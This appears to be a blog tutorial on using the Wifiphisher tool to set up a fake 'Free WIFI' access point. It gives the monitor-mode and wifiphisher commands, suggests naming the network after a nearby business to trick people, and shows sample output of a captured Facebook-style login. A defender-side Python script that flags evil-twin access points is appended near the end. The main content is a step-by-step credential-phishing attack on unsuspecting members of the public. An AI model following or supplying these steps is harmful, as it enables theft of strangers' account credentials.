Open Source Detective

Wifiphisher Rogue Access Point Attack


Introduction:

Wifiphisher is a powerful command line tool that ethical hackers can use to create rogue wifi networks and capture sensitive data from unsuspecting users. This tool comes with tons of functionality; for this tutorial I'm going to focus on the rogue network attack, in which hackers create fake wifi access points for users in a public place to connect to and share usernames/passwords with.

Prerequisites:

  1. Installation of Kali Linux (I run mine on a Raspberry Pi 4)
  2. Wifi Dongle with Monitor Mode capabilities

Tutorial:

In order to run this attack we will first need to put the attached wifi dongle into monitor mode. To do this, first type the following command to list out the attached interfaces:

ifconfig

Typically it will be the one named 'wlan1', since 'wlan0' is the internal wifi card, which isn't capable of monitor mode.

Next, run the following commands:

ifconfig wlan1 down

iwconfig wlan1 mode monitor

ifconfig wlan1 up

Now that you have a wifi interface with monitor mode enabled, you will be able to use that interface with the wifiphisher attack. Run the following command:

wifiphisher -i wlan1 -e "Free WIFI" -p oauth-login

The -i refers to the interface you will use, which is the one we set into monitor mode. The -e sets the ESSID of your fake network. In this case we are just going with 'Free WIFI', but depending on the setting you could use the name of the business you are in to trick users into feeling safe. Finally, the -p indicates an authentication page template which will pop up on the user's screen when they connect to the network. The one we picked will request their Facebook username/password to authenticate. Unknowing users will be tricked into handing over their Facebook credentials, thinking they are being used to authenticate them with the network. It's a simple example; wifiphisher gives users the ability to customize these templates for more sophisticated attacks.

The following is what you'll see when a victim connects. First you can see the list of connected victims' MAC addresses. Then you'll see in the HTTP requests that the user has provided a username and password that can be used to access their account.

Extensions feed: | Wifiphisher 1.4GIT
| ESSID: Free WIFI
| Channel: 6
| AP interface: wlan0
| Options: [Esc] Quit
|_____________________________

Connected Victims:
da:6b:29:73:58:12 10.0.0.53 Unknown iOS/MacOS

HTTP requests:
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUaCWcynf_cDxXwCLxiixG1c.ttf
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/d-6IYplOFocCacKzxwXSOKCWcynf_cDxXwCLxiixG1c.ttf
[*] GET request from 10.0.0.53 for http://fonts.gstatic.com/s/roboto/v15/mnpfi9pxYH-Go5UiibESIqCWcynf_cDxXwCLxiixG1c.ttf
[*] POST request from 10.0.0.53 with wfphshr-username=Test@test.com&wfphshr-password=password
[*] GET request from 10.0.0.53 for http://captive.apple.com/hotspot-detect.html
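The attack above works because a client cannot tell a venue's real access point from a twin that copies its name and drops encryption. As an added defender-side example, not part of the original post or of Wifiphisher itself, the following Python triages a constructed list of scanned access points against a constructed inventory of known BSSIDs and flags unknown BSSIDs, lookalike ESSIDs and open twins of protected networks; every ESSID, BSSID and inventory entry is assumed for the example.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ScanEntry:
    """One access point seen in a wireless scan (constructed, not real data)."""
    essid: str
    bssid: str
    channel: int
    security: str  # e.g. "OPEN" or "WPA2"

# Constructed inventory of the BSSIDs the venue actually operates, keyed by ESSID.
KNOWN_APS = {"Cafe-Guest": {"00:11:22:33:44:01", "00:11:22:33:44:02"}}

def normalize(essid):
    """Collapse case and punctuation so 'Cafe Guest' matches 'Cafe-Guest'."""
    return "".join(ch for ch in essid.lower() if ch.isalnum())

def triage(scan, known=KNOWN_APS):
    """Return (bssid, reason) findings for APs that look like rogue twins."""
    findings = []
    known_by_norm = {normalize(name): name for name in known}
    sec_by_essid = {}  # security types observed per ESSID across the scan
    for ap in scan:
        sec_by_essid.setdefault(ap.essid, set()).add(ap.security)
    for ap in scan:
        if ap.essid in known:
            if ap.bssid not in known[ap.essid]:
                findings.append((ap.bssid, f"unknown BSSID advertising {ap.essid!r}"))
        elif normalize(ap.essid) in known_by_norm:
            findings.append((ap.bssid, f"lookalike of {known_by_norm[normalize(ap.essid)]!r}"))
        # An open network sharing its name with a protected one is the classic evil twin.
        if ap.security == "OPEN" and sec_by_essid[ap.essid] - {"OPEN"}:
            findings.append((ap.bssid, f"open twin of protected ESSID {ap.essid!r}"))
    return findings

# Constructed scan: two legitimate APs, a lookalike, a spoofed BSSID that is also
# an open twin, and an unknown open network that is not flagged on its own.
SAMPLE_SCAN = [
    ScanEntry("Cafe-Guest", "00:11:22:33:44:01", 1, "WPA2"),
    ScanEntry("Cafe-Guest", "00:11:22:33:44:02", 11, "WPA2"),
    ScanEntry("Cafe Guest", "66:77:88:99:aa:bb", 6, "OPEN"),
    ScanEntry("Cafe-Guest", "aa:bb:cc:dd:ee:ff", 6, "OPEN"),
    ScanEntry("Free WIFI", "02:00:00:00:00:01", 6, "OPEN"),
]

if __name__ == "__main__":
    for bssid, reason in triage(SAMPLE_SCAN):
        print(f"{bssid}: {reason}")
```

An unknown open network like 'Free WIFI' is not flagged by itself, because a heuristic that fires on every new open SSID would drown the analyst; the inventory comparison is what makes the signal usable.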

Conclusion:

Wifiphisher is a powerful tool that any ethical hacker should be comfortable dispatching from their tool belt. Read more about its additional capabilities here.
